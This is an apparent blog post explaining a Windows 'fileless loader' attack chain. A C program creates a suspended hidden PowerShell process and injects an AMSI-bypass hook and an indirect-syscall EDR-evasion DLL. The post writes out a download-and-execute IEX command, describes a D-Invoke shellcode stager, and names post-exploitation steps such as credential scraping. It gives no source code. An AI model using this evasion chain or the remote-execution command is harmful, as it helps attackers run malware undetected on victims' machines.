Fileless Loader Combinations

To assist in static and dynamic obfuscation of malware via D-Invoke, AMSI patching, and BeaconGate-like Techniques

Dec 17, 2025

Disclaimer: So, I have written two articles in a LinkedIn Post as well as proof on VirusTotal of my attack. But I’ve been weighing this in my head for about two days, and I have chosen to deliberately keep the technique non-actionable without coding skills. The reason why is I have a prediction that this can really go off the rails really quickly, since all it requires is some form of command line access—either through a spearphishing attack, like a link shortcut, an MSI installer, or a common exploit.

+-------------------------------------------------------------------+

| STEPS FOR “FILELESS LOADER” ATTACK CHAIN                          |

+-------------------------------------------------------------------+

+-------------------------------------------------------------------+

| 1. INITIAL EXECUTION (Native C/C++)                               |

| - Attacker runs a compiled C executable.                          |

| - Why C? Native code is not initially evaluated by AMSI.          |

+-------------------------------------------------------------------+

        | Calls CreateProcess(CREATE_SUSPENDED)

+-------------------------------------------------------------------+

| 2. CREATE SUSPENDED PROCESS                                       |

| - Target process: powershell.exe                                  |

| - Arguments: -NoProfile -WindowStyle Hidden -Command [IEX download]|

| - STATUS: Process is created but has no running threads yet.      |

+-------------------------------------------------------------------+

        | The C Executable performs injections into the

        | suspended process memory space.

    +---+---------------------------------------+---+

    |                                           |

    V                                           V

+-------------------------------+   +-------------------------------+

| INJECTION A: AMSI BYPASS      |   | INJECTION B: BEACONGATE       |

| - Inject Thomas Carver’s      |   | - Inject Halo’s Gate +        |

|   AMSI Hook DLL shellcode.    |   |   Indirect Syscalls DLL.      |

| - Action: Hooks AmsiScanBuffer|   | - Action: Proxies ntdll.dll   |

|   to always return “clean”.   |   |   API calls to evade EDR hooks.|

+-------------------------------+   +-------------------------------+

    |                                           |

    +---+---------------------------------------+---+

        | The C Executable resumes the suspended thread.

+-------------------------------------------------------------------+

| 3. RESUME & FIRST STAGE EXECUTION                                 |

| - PowerShell process wakes up.                                    |

| - *CRITICAL:* AMSI is already hooked, and Syscalls are proxied    |

|   before PowerShell starts executing its command.                 |

| - PowerShell executes Invoke-WebRequest | Invoke-Expression.      |

+-------------------------------------------------------------------+

        | Downloads 2nd stage script from remote URL into memory.

+-------------------------------------------------------------------+

| 4. SECOND STAGE: D-INVOKE STAGER                                  |

| - The downloaded PowerShell script runs.                          |

| - It uses C# “D-Invoke” (Dynamic Invocation) with unsafe code     |

|   blocks/function pointers.                                       |

| - Why? D-Invoke itself is not inherently malicious and passes     |

|   static analysis.                                                |

+-------------------------------------------------------------------+

        | D-Invoke loads and executes the final shellcode.

+-------------------------------------------------------------------+

| 5. FINAL PAYLOAD EXECUTION                                        |

| - The actual malicious payload runs (e.g., Metasploit, Cobalt     |

|   Strike, Rust binary, kernel exploit).                           |

| - *RESULT:* The payload runs undetected by AMSI due to Step 2A,   |

|   and evades user-mode EDR hooks due to Step 2B.                  |

+-------------------------------------------------------------------+

+-------------------------------------------------------------------+

| 6. POST-EXPLOITATION (Optional/Loud)                              |

| - Further actions must occur within this *same* PowerShell session|

|   to remain protected by the injected hooks.                      |

| - Examples: Credential scraping, installing ZeroTier VPN.         |

+-------------------------------------------------------------------+

And that’s the last part: common exploits. So, a lot of people have dropped exploitation toolkits on GitHub for CVEs that are not well patched. For this reason, in my previous writings about the Velociraptor “Bring Your Own Vulnerability” exploit, I have decided to keep it non-actionable and kind of keep it in a broad, graphical overview.

First, I will start with the actual writing of how it works. And then I will show you graphically how it works, and what you can do with this.

So first, I have the source code. I can give you screenshots of the source code, but I want to make sure this stays non-actionable. You do need to know at least four languages. You need to know languages from C to C#, at least the .NET interpreter stack, I believe, is the best way to describe this. And so basically you need Visual Studio or Clang wrapped around Visual Studio.

Now, in testing, what you have to do is create a regular executable in C or a language that you prefer—but I prefer C because native code is not evaluated by AMSI (Antimalware Scan Interface). Your executable will first keep it easy. We’re going to check this first child a bit. What was it? “Infinity AMSI bypasses”—that’s what I called it. And it’s really simple and modular.

Unfortunately, if you use C as an executable or DLL, it will not support arguments because the second-stage wrapper requires dynamic invocation. It’s not that you cannot support arguments; it’s just that it’s really difficult to do without manual manipulation of the register and stack, much like binary exploitation. It is binary exploitation in some way, if you were to do that.

So let’s just keep it from the top down. So, the C or C++ executable executes with command line parameters: powershell -NoProfile -WindowStyle Hidden -Command Invoke-WebRequest -Uri [URL] -UseBasicParsing | Invoke-Expression

That’s basically what it does. However, it calls CreateProcess and parses this command, but creates it in a suspended state (CREATE_SUSPENDED). There are two reasons. The main reason is to beat a race condition, because the next command that we’re running within the PowerShell download and Invoke-Expression script in PowerShell, .NET, and C# will get evaluated by AMSI.

If you have never tried this before, play around—not with other AMSI bypasses like [Shakajack’s]* method—but an easier-to-evaluate method made by Thomas Carver over five years ago. This is a better example because it’s very verbose, as long as you didn’t remove the printing of the strings. But you’ll figure out that about every two characters, the Antimalware Scan Interface DLL evaluates what you’re typing and constantly checks if it’s known malicious signatures.

So that’s why we’re trying to beat the race condition using Create Suspended flags. So, as we keep it suspended, there is no other thread. It doesn’t have threads; it hasn’t started up yet. Neither is the process dead. So we create a second-stage remote process, okay? We inject into the suspended PowerShell process our own DLL shellcode, which is Thomas Carver’s AMSI Hook turned into DLL shellcode, which automatically hooks AmsiScanBuffer to always evaluate as non-malicious. That was the whole point.

Secondly, we’re going to create a second remote thread from our malicious executable, and this is called BeaconGate. So BeaconGate is a combination of Halo’s Gate and indirect syscalls, basically, that you may have heard of. This allows you to have a—I guess you could say—process-wide global proxy to proxy any malicious API call that reaches ntdll.dll, and it proxies it through an indirect syscall. So this is called BeaconGate.

And so we have two injected malicious DLLs in PowerShell before PowerShell even starts. Okay? One evaluates all AMSI checks as non-malicious, so you can run any malicious PowerShell command through the script that it will download and execute. And the second one is BeaconGate.

Finally, we’re going to convert this executable into a DLL, and then we’re going to use Monoxgas’s sRDI (Shellcode Reflective DLL Injection) to turn this into Position Independent DLL shellcode.

With that done, we rename and we add this entire malicious DLL—that does these two injections and runs the malicious command—into a dynamically invoked PowerShell script. Why do we use dynamic invocation (or D-Invoke)? Because dynamic invocation by itself is not malicious. It is, or will be, flagged malicious if you continue to add malicious code. But by itself, using a C# C-block and a form of combination of unmanaged function pointer delegates—otherwise known as a safely typed pointer in C# that calls and invokes shellcode—by itself, it is not malicious.

But if you were to do malicious commands after it, the way that AMSI works is that it evaluates the entire script, and it can flag on it. So when you have a D-Invoke stager—that’s what we have turned our fileless loader into now—it will not flag, because in legitimate IT operations, they legitimately can use D-Invoke to do things like automatic configuration or just for running a binary and deploying it to their entire domain, for example, in an enterprise environment. So by itself, D-Invoke is not malicious.

Now, using this, we now can execute any malicious command in PowerShell because everything is evaluated as non-malicious through our AMSI hook shellcode provided by Thomas Carver and our BeaconGate. So you can run Metasploit shellcode. You can run Cobalt Strike shellcode. You can run a non-obfuscated Rust binary. You can run kernel exploits, assuming that it wasn’t using like a kernel wrapper function API call. And it creates the custom BeaconGate as it is known as execution passes through the “gate,” is proxied, and passed with an indirect syscall.

So that is basically an attack from a top point of view. Let’s see what else I can do from my list.

Now, the rule is that every subsequent PowerShell command has to be within the same PowerShell session. If you invoke PowerShell again in a second-stage script downloaded from the internet to run filelessly, it creates a new PowerShell session and it’s not protected by these injected DLLs. That’s the catch.

But I thought of that; you can automate credential collection, although it’s extremely loud. You can helplessly install ZeroTier VPN to create site-to-site VPN attacks to a hardened Kali Linux or virtual machine to attack them directly, instead of having a public internet-facing Command and Control infrastructure. But many of these tricks are extremely loud post-compromise, and we have not yet addressed EDR evasion yet because this is all user mode. In fact, you don’t even need to be admin to do this. It will just run as the privilege of when the initial fileless loader works.

So there are limitations, and I never promised that this is going to wreck everything, but EDR has its own things; it must be bypassed.

Chang's Substack

Ready for more?